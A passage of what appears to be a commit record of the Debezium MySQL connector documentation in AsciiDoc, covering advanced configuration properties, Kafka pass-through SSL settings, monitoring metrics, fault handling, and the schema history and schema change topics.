a delete event is followed by a tombstone event. +\n +\n`true` - a delete operation is represented by a delete event and a subsequent tombstone event. +\n +\n`false` - only a delete event is emitted. +\n +\nAfter a source record is deleted, emitting a tombstone event (the default behavior) allows Kafka to completely delete all events that pertain to the key of the deleted row. \n\n|[[mysql-property-message-key-columns]]<<mysql-property-message-key-columns, `message.key.columns`>>\n|_empty string_\n|A semicolon separated list of tables with regular expressions that match table column names. The connector maps values in matching columns to key fields in change event records that it sends to Kafka topics. This is useful when a table does not have a primary key, or when you want to order change event records in a Kafka topic according to a field that is not a primary key. +\n +\nSeparate entries with semicolons. Insert a colon between the fully-qualified table name and its regular expression. The format (shown with spaces for clarity only) is: +\n +\n_database-name_ `.` _table-name_ `:` _regexp_ `;` ... +\n +\nFor example: +\n +\n`dbA.table_a:regex_1;dbB.table_b:regex_2;dbC.table_c:regex_3` +\n +\nIf `table_a` has an `id` column, and `regex_1` is `^i` (matches any column that starts with `i`), the connector maps the value in the `id` column of `table_a` to a key field in change events that the connector sends to Kafka. \n\n|[[mysql-property-binary-handling-mode]]<<mysql-property-binary-handling-mode,`binary.handling.mode`>>\n|bytes\n|Specifies how binary columns, for example, `blob`, `binary`, `varbinary`, should be represented in change events. Possible settings: +\n +\n`bytes` represents binary data as a byte array. +\n +\n`base64` represents binary data as a base64-encoded String. +\n +\n`hex` represents binary data as a hex-encoded (base16) String.\n\n|===\n\n[id=\"mysql-advanced-connector-configuration-properties\"]\n.Advanced MySQL connector configuration properties\n\nThe following table describes {link-prefix}:{link-mysql-connector}#mysql-advanced-connector-configuration-properties[advanced MySQL connector properties]. The default values for these properties rarely need to be changed. Therefore, you do not need to specify them in the connector configuration.\n\n.Descriptions of MySQL connector advanced configuration properties\n[cols=\"30%a,20%a,50%a\",options=\"header\",subs=\"+attributes\"]\n|===\n|Property |Default |Description\n\n|[[mysql-property-connect-keep-alive]]<<mysql-property-connect-keep-alive, `connect.keep.alive`>>\n|`true`\n|A Boolean value that specifies whether a separate thread should be used to ensure that the connection to the MySQL server\/cluster is kept alive.\n\n|[[mysql-property-table-ignore-builtin]]<<mysql-property-table-ignore-builtin, `table.ignore{zwsp}.builtin`>>\n|`true`\n|A Boolean value that specifies whether built-in system tables should be ignored. This applies regardless of the table include and exclude lists. By default, system tables are excluded from having their changes captured, and no events are generated when changes are made to any system tables.\n\n|[[mysql-property-database-history-kafka-recovery-poll-interval-ms]]<<mysql-property-database-history-kafka-recovery-poll-interval-ms, `database.history{zwsp}.kafka.recovery{zwsp}.poll.interval.ms`>>\n|`100`\n|An integer value that specifies the maximum number of milliseconds the connector should wait during startup\/recovery while polling for persisted data. The default is 100ms.\n\n|[[mysql-property-database-history-kafka-recovery-attempts]]<<mysql-property-database-history-kafka-recovery-attempts, `database.history{zwsp}.kafka.recovery{zwsp}.attempts`>>\n|`4`\n|The maximum number of times that the connector should try to read persisted history data before the connector recovery fails with an error. The maximum amount of time to wait after receiving no data is `recovery.attempts` x `recovery.poll.interval.ms`.\n\n|[[mysql-property-database-history-skip-unparseable-ddl]]<<mysql-property-database-history-skip-unparseable-ddl, `database.history{zwsp}.skip.unparseable{zwsp}.ddl`>>\n|`false`\n|A Boolean value that specifies whether the connector should ignore malformed or unknown database statements or stop processing so a human can fix the issue.\nThe safe default is `false`.\nSkipping should be used only with care as it can lead to data loss or mangling when the binlog is being processed.\n\n|[[mysql-property-database-history-store-only-monitored-tables-ddl]]<<mysql-property-database-history-store-only-monitored-tables-ddl, `database.history{zwsp}.store.only{zwsp}.monitored.tables{zwsp}.ddl`>>\n|`false`\n|A Boolean value that specifies whether the connector should record all DDL statements +\n +\n`true` records only those DDL statements that are relevant to tables whose changes are being captured by {prodname}. Set to `true` with care because missing data might become necessary if you change which tables have their changes captured. +\n +\nThe safe default is `false`.\n\n|[[mysql-property-database-ssl-mode]]<<mysql-property-database-ssl-mode, `database.ssl.mode`>>\n|`disabled`\n|Specifies whether to use an encrypted connection. Possible settings are: +\n +\n`disabled` specifies the use of an unencrypted connection. +\n +\n`preferred` establishes an encrypted connection if the server supports secure connections. If the server does not support secure connections, falls back to an unencrypted connection. +\n +\n`required` establishes an encrypted connection or fails if one cannot be made for any reason. +\n +\n`verify_ca` behaves like `required` but additionally it verifies the server TLS certificate against the configured Certificate Authority (CA) certificates and fails if the server TLS certificate does not match any valid CA certificates. +\n +\n`verify_identity` behaves like `verify_ca` but additionally verifies that the server certificate matches the host of the remote connection.\n\n|[[mysql-property-binlog-buffer-size]]<<mysql-property-binlog-buffer-size, `binlog.buffer.size`>>\n|0\n|The size of a look-ahead buffer used by the binlog reader. The default setting of `0` disables buffering. +\n +\nUnder specific conditions, it is possible that the MySQL binlog contains uncommitted data finished by a `ROLLBACK` statement.\nTypical examples are using savepoints or mixing temporary and regular table changes in a single transaction. +\n +\nWhen a beginning of a transaction is detected then {prodname} tries to roll forward the binlog position and find either `COMMIT` or `ROLLBACK` so it can determine whether to stream the changes from the transaction.\nThe size of the binlog buffer defines the maximum number of changes in the transaction that {prodname} can buffer while searching for transaction boundaries.\nIf the size of the transaction is larger than the buffer then {prodname} must rewind and re-read the events that have not fit into the buffer while streaming. +\n +\nNOTE: This feature is incubating. Feedback is encouraged. It is expected that this feature is not completely polished.\n\n|[[mysql-property-snapshot-mode]]<<mysql-property-snapshot-mode, `snapshot.mode`>>\n|`initial`\n|Specifies the criteria for running a snapshot when the connector starts. Possible settings are: +\n +\n`initial` - the connector runs a snapshot only when no offsets have been recorded for the logical server name. +\n +\n`when_needed` - the connector runs a snapshot upon startup whenever it deems it necessary. That is, when no offsets are available, or when a previously recorded offset specifies a binlog location or GTID that is not available in the server. +\n +\n`never` - the connector never uses snapshots. Upon first startup with a logical server name, the connector reads from the beginning of the binlog. Configure this behavior with care. It is valid only when the binlog is guaranteed to contain the entire history of the database. +\n +\n`schema_only` - the connector runs a snapshot of the schemas and not the data. This setting is useful when you do not need the topics to contain a consistent snapshot of the data but need them to have only the changes since the connector was started. +\n +\n`schema_only_recovery` - this is a recovery setting for a connector that has already been capturing changes. When you restart the connector, this setting enables recovery of a corrupted or lost database history topic. You might set it periodically to \"clean up\" a database history topic that has been growing unexpectedly. Database history topics require infinite retention.\n\n|[[mysql-property-snapshot-locking-mode]]<<mysql-property-snapshot-locking-mode, `snapshot.locking{zwsp}.mode`>>\n|`minimal`\na|Controls whether and how long the connector holds the global MySQL read lock, which prevents any updates to the database, while the connector is performing a snapshot. Possible settings are: +\n +\n`minimal` - the connector holds the global read lock for only the initial portion of the snapshot during which the connector reads the database schemas and other metadata. The remaining work in a snapshot involves selecting all rows from each table. The connector can do this in a consistent fashion by using a REPEATABLE READ transaction. This is the case even when the global read lock is no longer held and other MySQL clients are updating the database. +\n +\n`minimal_percona` - the connector holds link:https:\/\/www.percona.com\/doc\/percona-server\/5.7\/management\/backup_locks.html[the global backup lock] for only the initial portion of the snapshot during which the connector reads the database schemas and other metadata. The remaining work in a snapshot involves selecting all rows from each table. The connector can do this in a consistent fashion by using a REPEATABLE READ transaction. This is the case even when the global backup lock is no longer held and other MySQL clients are updating the database. This mode does not flush tables to disk, is not blocked by long-running reads, and is available only in Percona Server. +\n +\n`extended` - blocks all writes for the duration of the snapshot. Use this setting if there are clients that are submitting operations that MySQL excludes from REPEATABLE READ semantics. +\n +\n`none` - prevents the connector from acquiring any table locks during the snapshot. While this setting is allowed with all snapshot modes, it is safe to use if and _only_ if no schema changes are happening while the snapshot is running. For tables defined with MyISAM engine, the tables would still be locked despite this property being set as MyISAM acquires a table lock. This behavior is unlike InnoDB engine, which acquires row level locks.\n\n|[[mysql-property-snapshot-select-statement-overrides]]<<mysql-property-snapshot-select-statement-overrides, `snapshot.select{zwsp}.statement{zwsp}.overrides`>>\n|\n|Controls which table rows are included in snapshots. This property affects snapshots only. It does not affect events captured from the binlog. Specify a comma-separated list of fully-qualified table names in the form _databaseName{zwsp}.tableName_. +\n +\nFor each table that you specify, also specify another configuration property: `snapshot{zwsp}.select{zwsp}.statement{zwsp}.overrides{zwsp}._DB_NAME_._TABLE_NAME_`. For example, the name of the other configuration property might be: `snapshot{zwsp}.select{zwsp}.statement{zwsp}.overrides{zwsp}.customers{zwsp}.orders`. Set this property to a `SELECT` statement that obtains only the rows that you want in the snapshot. When the connector performs a snapshot, it executes this `SELECT` statement to retrieve data from that table. +\n +\nA possible use case for setting these properties is large, append-only tables. You can specify a `SELECT` statement that sets a specific point for where to start a snapshot, or where to resume a snapshot if a previous snapshot was interrupted.\n\n|[[mysql-property-min-row-count-to-stream-results]]<<mysql-property-min-row-count-to-stream-results, `min.row.count.to{zwsp}.stream.results`>>\n|`1000`\n|During a snapshot, the connector queries each table for which the connector is configured to capture changes. The connector uses each query result to produce a read event that contains data for all rows in that table. This property determines whether the MySQL connector puts results for a table into memory, which is fast but requires large amounts of memory, or streams the results, which can be slower but work for very large tables. The setting of this property specifies the minimum number of rows a table must contain before the connector streams results. +\n +\nTo skip all table size checks and always stream all results during a snapshot, set this property to `0`.\n\n|[[mysql-property-heartbeat-interval-ms]]<<mysql-property-heartbeat-interval-ms, `heartbeat.interval{zwsp}.ms`>>\n|`0`\n|Controls how frequently the connector sends heartbeat messages to a Kafka topic. The default behavior is that the connector does not send heartbeat messages. +\n +\nHeartbeat messages are useful for monitoring whether the connector is receiving change events from the database. Heartbeat messages might help decrease the number of change events that need to be re-sent when a connector restarts. To send heartbeat messages, set this property to a positive integer, which indicates the number of milliseconds between heartbeat messages. \n\n|[[mysql-property-heartbeat-topics-prefix]]<<mysql-property-heartbeat-topics-prefix, `heartbeat.topics{zwsp}.prefix`>>\n|`__debezium-heartbeat`\n|Controls the name of the topic to which the connector sends heartbeat messages. The topic name has this pattern: +\n +\n_heartbeat.topics.prefix_._server.name_ +\n +\nFor example, if the database server name is `fulfillment`, the default topic name is `__debezium-heartbeat.fulfillment`.\n\n|[[mysql-property-database-initial-statements]]<<mysql-property-database-initial-statements, `database.initial{zwsp}.statements`>>\n|\n|A semicolon separated list of SQL statements to be executed when a JDBC connection, not the connection that is reading the transaction log, to the database is established.\nTo specify a semicolon as a character in a SQ statement and not as a delimiter, use two semicolons, (`;;`). +\n +\nThe connector might establish JDBC connections at its own discretion, so this property is ony for configuring session parameters. It is not for executing DML statements.\n\n|[[mysql-property-snapshot-delay-ms]]<<mysql-property-snapshot-delay-ms, `snapshot.delay.ms`>>\n|\n|An interval in milliseconds that the connector should wait before performing a snapshot when the connector starts. If you are starting multiple connectors in a cluster, this property is useful for avoiding snapshot interruptions, which might cause re-balancing of connectors. \n\n|[[mysql-property-snapshot-fetch-size]]<<mysql-property-snapshot-fetch-size, `snapshot.fetch.size`>>\n|\n|During a snapshot, the connector reads table content in batches of rows. This property specifies the maximum number of rows in a batch.\n\n|[[mysql-property-snapshot-lock-timeout-ms]]<<mysql-property-snapshot-lock-timeout-ms, `snapshot.lock{zwsp}.timeout.ms`>>\n|`10000`\n|Positive integer that specifies the maximum amount of time (in milliseconds) to wait to obtain table locks when performing a snapshot. If the connector cannot acquire table locks in this time interval, the snapshot fails. See {link-prefix}:{link-mysql-connector}#mysql-snapshots[how MySQL connectors perform database snapshots].\n\n|[[mysql-property-enable-time-adjuster]]<<mysql-property-enable-time-adjuster, `enable.time{zwsp}.adjuster`>>\n|`true`\n|Boolean value that indicates whether the connector converts a 2-digit year specification to 4 digits. Set to `false` when conversion is fully delegated to the database. +\n +\nMySQL allows users to insert year values with either 2-digits or 4-digits. For 2-digit values, the value gets mapped to a year in the range 1970 - 2069. The default behavior is that the connector does the conversion. \n\nifdef::community[]\n|[[mysql-property-source-struct-version]]<<mysql-property-source-struct-version, `source.struct{zwsp}.version`>>\n|`v2`\n|Schema version for the `source` block in {prodname} events. {prodname} 0.10 introduced a few breaking changes to the structure of the `source` block in order to unify the exposed structure across all the connectors. +\n +\nBy setting this option to `v1`, the structure used in earlier versions can be produced. However, this setting is not recommended and is planned for removal in a future {prodname} version.\nendif::community[]\n\n|[[mysql-property-sanitize-field-names]]<<mysql-property-sanitize-field-names, `sanitize.field{zwsp}.names`>>\n|`true` if connector configuration sets the `key{zwsp}.converter` or `value{zwsp}.converter` property to the Avro converter. +\n`false` if not.\n|Indicates whether field names are sanitized to adhere to {link-prefix}:{link-avro-serialization}#avro-naming[Avro naming requirements].\n\n|[[mysql-property-skipped-operations]]<<mysql-property-skipped-operations, `skipped.operations`>>\n|\n|Comma-separated list of oplog operations to skip during streaming. Values that you can specify are: `c` for inserts, `u` for updates, `d` for deletes. By default, no operations are skipped.\n\n|===\n\n[id=\"mysql-pass-through-configuration-properties\"]\n.Pass-through configuration properties\n\nThe MySQL connector also supports {link-prefix}:{link-mysql-connector}#mysql-pass-through-configuration-properties[pass-through configuration properties] that are used when creating the Kafka producer and consumer. Specifically, all connector configuration properties that begin with the `database.history.producer.` prefix are used (without the prefix) when creating the Kafka producer that writes to the database history. All properties that begin with the prefix `database.history.consumer.` are used (without the prefix) when creating the Kafka consumer that reads the database history upon connector start-up.\n\nFor example, the following connector configuration properties can be used to secure connections to the Kafka broker:\n\n----\ndatabase.history.producer.security.protocol=SSL\ndatabase.history.producer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.producer.ssl.keystore.password=test1234\ndatabase.history.producer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.producer.ssl.truststore.password=test1234\ndatabase.history.producer.ssl.key.password=test1234\ndatabase.history.consumer.security.protocol=SSL\ndatabase.history.consumer.ssl.keystore.location=\/var\/private\/ssl\/kafka.server.keystore.jks\ndatabase.history.consumer.ssl.keystore.password=test1234\ndatabase.history.consumer.ssl.truststore.location=\/var\/private\/ssl\/kafka.server.truststore.jks\ndatabase.history.consumer.ssl.truststore.password=test1234\ndatabase.history.consumer.ssl.key.password=test1234\n----\n\nSee link:{link-kafka-docs}.html[the Kafka documentation] for more details about _pass-through_ properties.\n\n[id=\"mysql-pass-through-properties-for-database-drivers\"]\n.Pass-through properties for database drivers\n\nIn addition to the pass-through properties for the Kafka producer and consumer, there are {link-prefix}:{link-mysql-connector}#mysql-pass-through-properties-for-database-drivers[pass-through properties for database drivers]. These properties have the `database.` prefix. For example, `database.tinyInt1isBit=false` is passed to the JDBC URL.\n\n\n\/\/ Type: assembly\n\/\/ ModuleID: monitoring-debezium-mysql-connector-performance\n\/\/ Title: Monitoring {prodname} MySQL connector performance\n[[mysql-monitoring]]\n== Monitoring\n\nThe {prodname} MySQL connector provides three types of metrics that are in addition to the built-in support for JMX metrics that Zookeeper, Kafka, and Kafka Connect provide.\n\n* {link-prefix}:{link-mysql-connector}#mysql-snapshot-metrics[Snapshot metrics] provide information about connector operation while performing a snapshot.\n* {link-prefix}:{link-mysql-connector}#mysql-binlog-metrics[Binlog metrics] provide information about connector operation when the connector is reading the binlog.\n* {link-prefix}:{link-mysql-connector}#mysql-schema-history-metrics[Schema history metrics] provide information about the status of the connector's schema history.\n\n{link-prefix}:{link-debezium-monitoring}[{prodname} monitoring documentation] provides details for how to expose these metrics by using JMX.\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-during-snapshots-of-mysql-databases\n\/\/ Title: Monitoring {prodname} during snapshots of MySQL databases\n[[mysql-snapshot-metrics]]\n=== Snapshot metrics\n\nThe *MBean* is `debezium.mysql:type=connector-metrics,context=snapshot,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-snapshot-metrics.adoc[leveloffset=+1]\n\nThe {prodname} MySQL connector also provides the `HoldingGlobalLock` custom snapshot metric. This metric is set to a Boolean value that indicates whether the connector currently holds a global or table write lock. \n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-mysql-connector-binlog-reading\n\/\/ Title: Monitoring {prodname} MySQL connector binlog reading\n[[mysql-binlog-metrics]]\n=== Binlog metrics\n\nThe *MBean* is `debezium.mysql:type=connector-metrics,context=binlog,server=<database.server.name>`.\n\nTransaction-related attributes are available only if binlog event buffering is enabled. See {link-prefix}:{link-mysql-connector}#mysql-property-binlog-buffer-size[`binlog.buffer.size`] in the advanced connector configuration properties for more details.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-streaming-metrics.adoc[leveloffset=+1]\n\nThe {prodname} MySQL connector also provides the following custom binlog metrics:\n\n.Descriptions of custom binlog metrics\n[cols=\"3,2,5\",options=\"header\"]\n|===\n|Attribute |Type |Description\n\n|`BinlogFilename`\n|`string`\n|The name of the binlog file that the connector has most recently read.\n\n|`BinlogPosition`\n|`long`\n|The most recent position (in bytes) within the binlog that the connector has read.\n\n|`IsGtidModeEnabled`\n|`boolean`\n|Flag that denotes whether the connector is currently tracking GTIDs from MySQL server.\n\n|`GtidSet`\n|`string`\n|The string representation of the most recent GTID set processed by the connector when reading the binlog.\n\n|`NumberOfSkipped{zwsp}Events`\n|`long`\n|The number of events that have been skipped by the MySQL connector. Typically events are skipped due to a malformed or unparseable event from MySQL's binlog.\n\n|`NumberOfDisconnects`\n|`long`\n|The number of disconnects by the MySQL connector.\n\n|`NumberOfRolledBack{zwsp}Transactions`\n|`long`\n|The number of processed transactions that were rolled back and not streamed.\n\n|`NumberOfNotWell{zwsp}FormedTransactions`\n|`long`\n|The number of transactions that have not conformed to the expected protocol of `BEGIN` + `COMMIT`\/`ROLLBACK`. This value should be `0` under normal conditions.\n\n|`NumberOfLarge{zwsp}Transactions`\n|`long`\n|The number of transactions that have not fit into the look-ahead buffer. For optimal performance, this value should be significantly smaller than `NumberOfCommittedTransactions` and `NumberOfRolledBackTransactions`.\n\n|===\n\n\/\/ Type: reference\n\/\/ ModuleID: monitoring-debezium-mysql-connector-schema history\n\/\/ Title: Monitoring {prodname} MySQL connector schema history\n[[mysql-schema-history-metrics]]\n=== Schema history metrics\n\nThe *MBean* is `debezium.mysql:type=connector-metrics,context=schema-history,server=_<database.server.name>_`.\n\ninclude::{partialsdir}\/modules\/all-connectors\/ref-connector-monitoring-schema-history-metrics.adoc[leveloffset=+1]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mysql-connectors-handle-faults-and-problems\n\/\/ Title: How {prodname} MySQL connectors handle faults and problems\n[[mysql-when-things-go-wrong]]\n== Behavior when things go wrong\n\n{prodname} is a distributed system that captures all changes in multiple upstream databases; it never misses or loses an event. When the system is operating normally or being managed carefully then {prodname} provides _exactly once_ delivery of every change event record. \n\nIf a fault does happen then the system does not lose any events. However, while it is recovering from the fault, it might repeat some change events. In these abnormal situations, {prodname}, like Kafka, provides _at least once_ delivery of change events.\n\nifdef::community[]\nThe rest of this section describes how {prodname} handles various kinds of faults and problems.\nendif::community[]\n\nifdef::product[]\nDetails are in the following sections: \n\n* xref:debezium-mysql-connector-configuration-and-startup-errors[]\n* xref:mysql-becomes-unavailable-while-debezium-is-running[]\n* xref:debezium-mysql-kafka-connect-process-stops-gracefully[]\n* xref:debezium-mysql-kafka-connect-process-crashes[]\n* xref:debezium-mysql-kafka-process-becomes-unavailable[]\n* xref:mysql-purges-binlog-files-used-by-debezium[]\n\nendif::product[]\n\n[id=\"debezium-mysql-connector-configuration-and-startup-errors\"]\n=== Configuration and startup errors\n\nIn the following situations, the connector fails when trying to start, reports an error or exception in the log, and stops running:\n\n* The connector's configuration is invalid.\n* The connector cannot successfully connect to the MySQL server by using the specified connection parameters.\n* The connector is attempting to restart at a position in the binlog for which MySQL no longer has the history available.\n\nIn these cases, the error message has details about the problem and possibly a suggested workaround. After you correct the configuration or address the MySQL problem, restart the connector.\n\n[id=\"mysql-becomes-unavailable-while-debezium-is-running\"]\n=== MySQL becomes unavailable\n\nIf your MySQL server becomes unavailable, the {prodname} MySQL connector fails with an error and the connector stops. When the server is available again, restart the connector.\n\nHowever, if GTIDs are enabled for a highly available MySQL cluster, you can restart the connector immediately. It will connect to a different MySQL server in the cluster, find the location in the server's binlog that represents the last transaction, and begin reading the new server's binlog from that specific location.\n\nIf GTIDs are not enabled, the connector records the binlog position of only the MySQL server to which it was connected. To restart from the correct binlog position, you must reconnect to that specific server.\n\n[id=\"debezium-mysql-kafka-connect-process-stops-gracefully\"]\n=== Kafka Connect stops gracefully\n\nWhen Kafka Connect stops gracefully, there is a short delay while the {prodname} MySQL connector tasks are stopped and restarted on new Kafka Connect processes.\n\n[id=\"debezium-mysql-kafka-connect-process-crashes\"]\n=== Kafka Connect process crashes\n\nIf Kafka Connect crashes, the process stops and any {prodname} MySQL connector tasks terminate without their most recently-processed offsets being recorded. In distributed mode, Kafka Connect restarts the connector tasks on other processes. However, the MySQL connector resumes from the last offset recorded by the earlier processes. This means that the replacement tasks might generate some of the same events processed prior to the crash, creating duplicate events.\n\nEach change event message includes source-specific information that you can use to identify duplicate events, for example: \n\n* Event origin\n* MySQL server's event time\n* The binlog file name and position\n* GTIDs (if used)\n\n[id=\"debezium-mysql-kafka-process-becomes-unavailable\"]\n=== Kafka becomes unavailable\n\nThe Kafka Connect framework records {prodname} change events in Kafka by using the Kafka producer API. If the Kafka brokers become unavailable, the {prodname} MySQL connector pauses until the connection is reestablished and the connector resumes where it left off.\n\n[id=\"mysql-purges-binlog-files-used-by-debezium\"]\n=== MySQL purges binlog files\n\nIf the {prodname} MySQL connector stops for too long, the MySQL server purges older binlog files and the connector's last position may be lost. When the connector is restarted, the MySQL server no longer has the starting point and the connector performs another initial snapshot. If the snapshot is disabled, the connector fails with an error.\n\nSee {link-prefix}:{link-mysql-connector}#mysql-snapshots[snapshots] for details about how MySQL connectors perform initial snapshots.\n","old_contents":"\/\/ Category: debezium-using\n\/\/ Type: assembly\n\n:toc:\n:toc-placement: macro\n:linkattrs:\n:icons: font\n:source-highlighter: highlight.js\n:context: debezium\n\n[id=\"debezium-connector-for-mysql\"]\n= {prodname} connector for MySQL\n\nMySQL has a binary log (binlog) that records all operations in the order in which they are committed to the database. This includes changes to table schemas as well as changes to the data in tables. MySQL uses the binlog for replication and recovery.\n\nThe {prodname} MySQL connector reads the binlog, produces change events for row-level `INSERT`, `UPDATE`, and `DELETE` operations, and emits the change events to Kafka topics. Client applications read those Kafka topics.\n\nAs MySQL is typically set up to purge binlogs after a specified period of time, the MySQL connector performs an initial _consistent snapshot_ of each of your databases. The MySQL connector reads the binlog from the point at which the snapshot was made.\n\nifdef::product[]\nInformation and procedures for using a {prodname} MySQL connector are organized as follows:\n\n* xref:how-debezium-mysql-connectors-work[]\n* xref:descriptions-of-debezium-mysql-connector-data-change-events[]\n* xref:how-debezium-mysql-connectors-map-data-types[]\n* xref:setting-up-mysql-to-run-a-debezium-connector[]\n* xref:deploying-debezium-mysql-connectors[]\n* xref:monitoring-debezium-mysql-connector-performance[]\n* xref:how-debezium-mysql-connectors-handle-faults-and-problems[]\n\nendif::product[]\n\n\/\/ Type: assembly\n\/\/ ModuleID: how-debezium-mysql-connectors-work\n\/\/ Title: How {prodname} MySQL connectors work\n[[how-the-mysql-connector-works]]\n== How the connector works\n\nTo optimally configure and run a {prodname} MySQL connector, it is helpful to understand how the connector tracks the structure of tables, exposes schema changes, performs snapshots, and determines Kafka topic names. An overview of the MySQL topologies that the connector supports is useful for planning your application. \n\nifdef::product[]\nDetails are in the following topics:\n\n* xref:how-debezium-mysql-connectors-handle-database-schema-changes[]\n* xref:how-debezium-mysql-connectors-expose-database-schema-changes[]\n* xref:how-debezium-mysql-connectors-perform-database-snapshots[]\n* xref:default-names-of-kafka-topics-that-receive-debezium-mysql-change-event-records[]\n* xref:mysql-topologies-supported-by-debezium-connectors[]\n\nendif::product[]\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mysql-connectors-handle-database-schema-changes\n\/\/ Title: How {prodname} MySQL connectors handle database schema changes\n[[mysql-schema-history-topic]]\n=== Schema history topic\n\nWhen a database client queries a database, the client uses the database\u2019s current schema. However, the database schema can be changed at any time, which means that the connector must be able to identify what the schema was at the time each insert, update, or delete operation was recorded. Also, a connector cannot just use the current schema because the connector might be processing events that are relatively old and may have been recorded before the tables' schemas were changed. \n\nTo handle this, MySQL includes in the binlog not only the row-level changes to the data, but also the DDL statements that are applied to the database. As the connector reads the binlog and comes across these DDL statements, it parses them and updates an in-memory representation of each table\u2019s schema. The connector uses this schema representation to identify the structure of the tables at the time of each insert, update, or delete operation and to produce the appropriate change event. In a separate database history Kafka topic, the connector records all DDL statements along with the position in the binlog where each DDL statement appeared.\n\nWhen the connector restarts after having crashed or been stopped gracefully, the connector starts reading the binlog from a specific position, that is, from a specific point in time. The connector rebuilds the table structures that existed at this point in time by reading the database history Kafka topic and parsing all DDL statements up to the point in the binlog where the connector is starting.\n\nThis database history topic is for connector use only. The connector can optionally See {link-prefix}:{link-mysql-connector}#mysql-schema-change-topic[emit schema change events to a different topic that is intended for consumer applications].\n\nWhen the MySQL connector captures changes in a table to which a schema change tool such as `gh-ost` or `pt-online-schema-change` is applied there are helper tables created during the migration process. The connector needs to be configured to capture change to these helper tables. If consumers do not need the records generated for helper tables then a simple message transform can be applied to filter them out.\n\nSee {link-prefix}:{link-mysql-connector}#mysql-topic-names[default names for topics] that receive {prodname} event records.\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mysql-connectors-expose-database-schema-changes\n\/\/ Title: How {prodname} MySQL connectors expose database schema changes\n[id=\"mysql-schema-change-topic\"]\n=== Schema change topic\n\nYou can configure a {prodname} MySQL connector to produce schema change events that include all DDL statements applied to databases in the MySQL server. The connector emits these events to a Kafka topic named _serverName_ where _serverName_ is the name of the connector as specified by the `database.server.name` connector configuration property.\n\nIf you choose to use _schema change events_, ensure that you consume records from the schema change topic. The database history topic is for connector use only. \n\nIMPORTANT: A global order for events emitted to the schema change topic is vital. Therefore, you must not partition the database history topic. This means that you must specify a partition count of `1` when creating the database history topic. When relying on auto topic creation, make sure that Kafka\u2019s `num.partitions` configuration option, which specifies the default number of partitions, is set to `1`.\n\nEach record that the connector emits to the schema change topic contains a message key that includes the name of the connected database when the DDL statement was applied, for example: \n\n[source,json,subs=\"+attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.SchemaChangeKey\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"databaseName\",\n \"type\": \"string\",\n \"optional\": false\n }\n ]\n },\n \"payload\": {\n \"databaseName\": \"inventory\"\n }\n}\n----\n\nThe schema change event record value contains a structure that includes the DDL statements, the name of the database to which the statements were applied, and the position in the binlog where the statements appeared, for example: \n\n[source,json,subs=\"attributes\"]\n----\n{\n \"schema\": {\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.SchemaChangeValue\",\n \"optional\": false,\n \"fields\": [\n {\n \"field\": \"databaseName\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"ddl\",\n \"type\": \"string\",\n \"optional\": false\n },\n {\n \"field\": \"source\",\n \"type\": \"struct\",\n \"name\": \"io.debezium.connector.mysql.Source\",\n \"optional\": false,\n \"fields\": [\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"version\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"name\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"server_id\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"ts_sec\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"gtid\"\n },\n {\n \"type\": \"string\",\n \"optional\": false,\n \"field\": \"file\"\n },\n {\n \"type\": \"int64\",\n \"optional\": false,\n \"field\": \"pos\"\n },\n {\n \"type\": \"int32\",\n \"optional\": false,\n \"field\": \"row\"\n },\n {\n \"type\": \"boolean\",\n \"optional\": true,\n \"default\": false,\n \"field\": \"snapshot\"\n },\n {\n \"type\": \"int64\",\n \"optional\": true,\n \"field\": \"thread\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"db\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"table\"\n },\n {\n \"type\": \"string\",\n \"optional\": true,\n \"field\": \"query\"\n }\n ]\n }\n ]\n },\n \"payload\": {\n \"databaseName\": \"inventory\",\n \"ddl\": \"CREATE TABLE products ( id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY, name VARCHAR(255) NOT NULL, description VARCHAR(512), weight FLOAT ); ALTER TABLE products AUTO_INCREMENT = 101;\",\n \"source\" : {\n \"version\": \"{debezium-version}\",\n \"name\": \"mysql-server-1\",\n \"server_id\": 0,\n \"ts_sec\": 0,\n \"gtid\": null,\n \"file\": \"mysql-bin.000003\",\n \"pos\": 154,\n \"row\": 0,\n \"snapshot\": true,\n \"thread\": null,\n \"db\": null,\n \"table\": null,\n \"query\": null\n }\n }\n}\n----\n\nThe `ddl` field might contain multiple DDL statements. Each statement applies to the database in the `databaseName` field. The statements appear in the order in which they were applied to the database. The `source` field is structured exactly as a standard data change event written to table-specific topics. This field is useful to correlate events on different topics.\n\n[source,json,subs=\"+attributes\"]\n----\n....\n\"payload\": {\n \"databaseName\": \"inventory\",\n \"ddl\": \"CREATE TABLE products ( id INTEGER NOT NULL AUTO_INCREMENT PRIMARY KEY,...)\",\n \"source\" : {\n ...\n }\n}\n....\n----\n\nA client can submit multiple DDL statements to be applied to multiple databases. If MySQL applies them atomically, the connector takes the DDL statements in order, groups them by database, and creates a schema change event for each group. If MySQL applies them individually, the connector creates a separate schema change event for each statement.\n\nSee also: {link-prefix}:{link-mysql-connector}#mysql-schema-history-topic[schema history topic].\n\n\/\/ Type: concept\n\/\/ ModuleID: how-debezium-mysql-connectors-perform-database-snapshots\n\/\/ Title: How {prodname} MySQL connectors perform database snapshots\n[[mysql-snapshots]]\n=== Snapshots\n\nWhen a {prodname} MySQL connector is first started, it performs an 